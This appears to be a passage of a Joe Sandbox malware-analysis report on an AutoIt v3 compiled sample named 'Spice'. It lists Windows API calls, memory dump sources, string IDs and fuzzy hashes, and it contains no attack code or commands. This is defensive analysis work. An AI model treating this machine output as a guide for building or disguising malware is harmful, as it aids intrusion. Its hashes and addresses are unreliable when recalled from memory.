                                                                                                                                                                                                                                      • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00EE8464
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                                                                                                                                      • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                                                                                                                                      • API String ID: 2211948467-2373415609
                                                                                                                                                                                                                                      • Opcode ID: d5c4a98d041e1d0459daeb9247d2f03b0ac032519f01a046276432985f75a131
                                                                                                                                                                                                                                      • Instruction ID: ae6d9045a127fcdccd4fa911ceb6055ca0c4f9c2e9272ef9e280c59935369b4c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d5c4a98d041e1d0459daeb9247d2f03b0ac032519f01a046276432985f75a131
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B2026C71A00209EFDB14DF65CD89EAE7BB9FB48310F048159F919AB2A1CB71AD01DF60
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CharUpperBuffW.USER32(?,?,00F00980), ref: 00EF3C65
                                                                                                                                                                                                                                      • IsWindowVisible.USER32(?), ref: 00EF3C89
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: BuffCharUpperVisibleWindow
                                                                                                                                                                                                                                      • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                                                                                                                                                                                      • API String ID: 4105515805-45149045
                                                                                                                                                                                                                                      • Opcode ID: d8baca12fa43143a16cec4b26302e9d7bb87033be561df9713f0a34383357d7e
                                                                                                                                                                                                                                      • Instruction ID: 6fe6e0b82eb8a792d48f3cff20b5eba141ed929bdba77a4d8d038f65160902e2
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d8baca12fa43143a16cec4b26302e9d7bb87033be561df9713f0a34383357d7e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4DD14F70204219CBCB14EF20C551ABEB7E5AF94344F549458FA857B2E2CF32ED4ADB92
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SetTextColor.GDI32(?,00000000), ref: 00EFAC55
                                                                                                                                                                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 00EFAC86
                                                                                                                                                                                                                                      • GetSysColor.USER32(0000000F), ref: 00EFAC92
                                                                                                                                                                                                                                      • SetBkColor.GDI32(?,000000FF), ref: 00EFACAC
                                                                                                                                                                                                                                      • SelectObject.GDI32(?,?), ref: 00EFACBB
                                                                                                                                                                                                                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 00EFACE6
                                                                                                                                                                                                                                      • GetSysColor.USER32(00000010), ref: 00EFACEE
                                                                                                                                                                                                                                      • CreateSolidBrush.GDI32(00000000), ref: 00EFACF5
                                                                                                                                                                                                                                      • FrameRect.USER32(?,?,00000000), ref: 00EFAD04
                                                                                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 00EFAD0B
                                                                                                                                                                                                                                      • InflateRect.USER32(?,000000FE,000000FE), ref: 00EFAD56
                                                                                                                                                                                                                                      • FillRect.USER32(?,?,?), ref: 00EFAD88
                                                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00EFADB3
                                                                                                                                                                                                                                        • Part of subcall function 00EFAF18: GetSysColor.USER32(00000012), ref: 00EFAF51
                                                                                                                                                                                                                                        • Part of subcall function 00EFAF18: SetTextColor.GDI32(?,?), ref: 00EFAF55
                                                                                                                                                                                                                                        • Part of subcall function 00EFAF18: GetSysColorBrush.USER32(0000000F), ref: 00EFAF6B
                                                                                                                                                                                                                                        • Part of subcall function 00EFAF18: GetSysColor.USER32(0000000F), ref: 00EFAF76
                                                                                                                                                                                                                                        • Part of subcall function 00EFAF18: GetSysColor.USER32(00000011), ref: 00EFAF93
                                                                                                                                                                                                                                        • Part of subcall function 00EFAF18: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00EFAFA1
                                                                                                                                                                                                                                        • Part of subcall function 00EFAF18: SelectObject.GDI32(?,00000000), ref: 00EFAFB2
                                                                                                                                                                                                                                        • Part of subcall function 00EFAF18: SetBkColor.GDI32(?,00000000), ref: 00EFAFBB
                                                                                                                                                                                                                                        • Part of subcall function 00EFAF18: SelectObject.GDI32(?,?), ref: 00EFAFC8
                                                                                                                                                                                                                                        • Part of subcall function 00EFAF18: InflateRect.USER32(?,000000FF,000000FF), ref: 00EFAFE7
                                                                                                                                                                                                                                        • Part of subcall function 00EFAF18: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00EFAFFE
                                                                                                                                                                                                                                        • Part of subcall function 00EFAF18: GetWindowLongW.USER32(00000000,000000F0), ref: 00EFB013
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4124339563-0
                                                                                                                                                                                                                                      • Opcode ID: 94e8a36a5506e27a73f2a5565f3dd95b6ebb274110894967e37533f1ee0bc546
                                                                                                                                                                                                                                      • Instruction ID: 365a2af089b350e20019fcbad72c1cb77a79918609acd1079e8411688273d27c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 94e8a36a5506e27a73f2a5565f3dd95b6ebb274110894967e37533f1ee0bc546
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 37A1A2B1008309AFD7119F64DC08F6B7BA9FF88325F145A29F666AA1E0DB31D940DF52
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • DestroyWindow.USER32(?,?,?), ref: 00E73072
                                                                                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 00E730B8
                                                                                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 00E730C3
                                                                                                                                                                                                                                      • DestroyIcon.USER32(00000000,?,?,?), ref: 00E730CE
                                                                                                                                                                                                                                      • DestroyWindow.USER32(00000000,?,?,?), ref: 00E730D9
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001308,?,00000000), ref: 00EAC77C
                                                                                                                                                                                                                                      • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00EAC7B5
                                                                                                                                                                                                                                      • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00EACBDE
                                                                                                                                                                                                                                        • Part of subcall function 00E71F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00E72412,?,00000000,?,?,?,?,00E71AA7,00000000,?), ref: 00E71F76
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001053), ref: 00EACC1B
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00EACC32
                                                                                                                                                                                                                                      • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00EACC48
                                                                                                                                                                                                                                      • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00EACC53
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                                                                                                                                                                                      • String ID: 0
                                                                                                                                                                                                                                      • API String ID: 464785882-4108050209
                                                                                                                                                                                                                                      • Opcode ID: dc699cb044998f827f0446e9bb5fc5972b2a3ba22e88aa58f6051fc4701776aa
                                                                                                                                                                                                                                      • Instruction ID: 5533b5ce60d10a22fbdd46a8f9664ba109cdcd5c49342b6ccf98137f9763258b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dc699cb044998f827f0446e9bb5fc5972b2a3ba22e88aa58f6051fc4701776aa
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4B129D30604201EFDB65CF24C884BA9BBE5BF49314F24A569E589EF262CB31FD41DB91
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: __wcsnicmp$Exception@8Throwstd::exception::exception
                                                                                                                                                                                                                                      • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                                                                                                                                                                      • API String ID: 2660009612-1645009161
                                                                                                                                                                                                                                      • Opcode ID: 7ea2fe095503e14d11b04942549148bb86b31538667cf38b0cb997398fd21b5e
                                                                                                                                                                                                                                      • Instruction ID: 437856cbe85f11e2cea55a1aa60571c64366631d9cd8fcfaaa8dcb1c5b31298d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7ea2fe095503e14d11b04942549148bb86b31538667cf38b0cb997398fd21b5e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 45A18D30A00209ABCF15BF61DC52EAF7BA8AF44740F146069F90DBA292DB71DE41EB51
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • DestroyWindow.USER32(00000000), ref: 00EE7BC8
                                                                                                                                                                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00EE7C87
                                                                                                                                                                                                                                      • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00EE7CC5
                                                                                                                                                                                                                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00EE7CD7
                                                                                                                                                                                                                                      • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00EE7D1D
                                                                                                                                                                                                                                      • GetClientRect.USER32(00000000,?), ref: 00EE7D29
                                                                                                                                                                                                                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00EE7D6D
                                                                                                                                                                                                                                      • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00EE7D7C
                                                                                                                                                                                                                                      • GetStockObject.GDI32(00000011), ref: 00EE7D8C
                                                                                                                                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00EE7D90
                                                                                                                                                                                                                                      • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00EE7DA0
                                                                                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00EE7DA9
                                                                                                                                                                                                                                      • DeleteDC.GDI32(00000000), ref: 00EE7DB2
                                                                                                                                                                                                                                      • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00EE7DDE
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000030,00000000,00000001), ref: 00EE7DF5
                                                                                                                                                                                                                                      • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00EE7E30
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00EE7E44
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000404,00000001,00000000), ref: 00EE7E55
                                                                                                                                                                                                                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00EE7E85
                                                                                                                                                                                                                                      • GetStockObject.GDI32(00000011), ref: 00EE7E90
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00EE7E9B
                                                                                                                                                                                                                                      • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00EE7EA5
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                                                                                                                                      • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                                                                                                                                      • API String ID: 2910397461-517079104
                                                                                                                                                                                                                                      • Opcode ID: c8b636dda46acdd3506ad5692db7c8a2478082909ca7079487872344c4ce65bb
                                                                                                                                                                                                                                      • Instruction ID: f8ca345a444f9758c03fbf6e87b167f7a556495d7196c14bd8c780fe10e99332
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c8b636dda46acdd3506ad5692db7c8a2478082909ca7079487872344c4ce65bb
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DEA163B1640619BFEB14DB64DC4AFAFB7A9EB09710F144114FA15A72E0CB70AD01DF60
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SetErrorMode.KERNEL32(00000001), ref: 00EDB361
                                                                                                                                                                                                                                      • GetDriveTypeW.KERNEL32(?,00F02C4C,?,\\.\,00F00980), ref: 00EDB43E
                                                                                                                                                                                                                                      • SetErrorMode.KERNEL32(00000000,00F02C4C,?,\\.\,00F00980), ref: 00EDB59C
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ErrorMode$DriveType
                                                                                                                                                                                                                                      • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                                                                                                                                      • API String ID: 2907320926-4222207086
                                                                                                                                                                                                                                      • Opcode ID: f268c561a84caa4c188af14c648dbb13195e0d20f647de156b678c0b275aefe5
                                                                                                                                                                                                                                      • Instruction ID: 39b26b4a45e186ee9d82bdd54df42f0b694d05fdf9c6b61b880e1db70a571d7b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f268c561a84caa4c188af14c648dbb13195e0d20f647de156b678c0b275aefe5
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F5517570B44209DBCB00DB20E942ABD77E2FB45744B25615BE806B7391F771EE43AB52
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 00EFA0F7
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00EFA1B0
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001102,00000002,?), ref: 00EFA1CC
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend$Window
                                                                                                                                                                                                                                      • String ID: 0
                                                                                                                                                                                                                                      • API String ID: 2326795674-4108050209
                                                                                                                                                                                                                                      • Opcode ID: d07afca3e229a2f7e1ee7a7268177854c1e5a2fe5b4959e1b746514331bf2a94
                                                                                                                                                                                                                                      • Instruction ID: 4455c5c8130fe3d103c885b91a4d0f0f436d975838e2b10d920e042f2f734bd6
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d07afca3e229a2f7e1ee7a7268177854c1e5a2fe5b4959e1b746514331bf2a94
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CC02F3B0104309AFD715CF14C848BBABBE5FF85318F08952DF699AB2A1CB75D940DB52
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetSysColor.USER32(00000012), ref: 00EFAF51
                                                                                                                                                                                                                                      • SetTextColor.GDI32(?,?), ref: 00EFAF55
                                                                                                                                                                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 00EFAF6B
                                                                                                                                                                                                                                      • GetSysColor.USER32(0000000F), ref: 00EFAF76
                                                                                                                                                                                                                                      • CreateSolidBrush.GDI32(?), ref: 00EFAF7B
                                                                                                                                                                                                                                      • GetSysColor.USER32(00000011), ref: 00EFAF93
                                                                                                                                                                                                                                      • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00EFAFA1
                                                                                                                                                                                                                                      • SelectObject.GDI32(?,00000000), ref: 00EFAFB2
                                                                                                                                                                                                                                      • SetBkColor.GDI32(?,00000000), ref: 00EFAFBB
                                                                                                                                                                                                                                      • SelectObject.GDI32(?,?), ref: 00EFAFC8
                                                                                                                                                                                                                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 00EFAFE7
                                                                                                                                                                                                                                      • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00EFAFFE
                                                                                                                                                                                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00EFB013
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00EFB05F
                                                                                                                                                                                                                                      • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00EFB086
                                                                                                                                                                                                                                      • InflateRect.USER32(?,000000FD,000000FD), ref: 00EFB0A4
                                                                                                                                                                                                                                      • DrawFocusRect.USER32(?,?), ref: 00EFB0AF
                                                                                                                                                                                                                                      • GetSysColor.USER32(00000011), ref: 00EFB0BD
                                                                                                                                                                                                                                      • SetTextColor.GDI32(?,00000000), ref: 00EFB0C5
                                                                                                                                                                                                                                      • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00EFB0D9
                                                                                                                                                                                                                                      • SelectObject.GDI32(?,00EFAC1F), ref: 00EFB0F0
                                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 00EFB0FB
                                                                                                                                                                                                                                      • SelectObject.GDI32(?,?), ref: 00EFB101
                                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 00EFB106
                                                                                                                                                                                                                                      • SetTextColor.GDI32(?,?), ref: 00EFB10C
                                                                                                                                                                                                                                      • SetBkColor.GDI32(?,?), ref: 00EFB116
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1996641542-0
                                                                                                                                                                                                                                      • Opcode ID: 690bf5a3bfdb2d18e7adddd73187e2b67acbbd6554aff88c307d8cce625be6e8
                                                                                                                                                                                                                                      • Instruction ID: bb355e6c22495615c4c83e5141bc15687edf17d646add27924a5f62096e41541
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 690bf5a3bfdb2d18e7adddd73187e2b67acbbd6554aff88c307d8cce625be6e8
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 506119B290021DAFDB119FA4DC48BAE7B79FF08320F158115FA15BB2A1DB759940DF90
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00EF90EA
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00EF90FB
                                                                                                                                                                                                                                      • CharNextW.USER32(0000014E), ref: 00EF912A
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00EF916B
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00EF9181
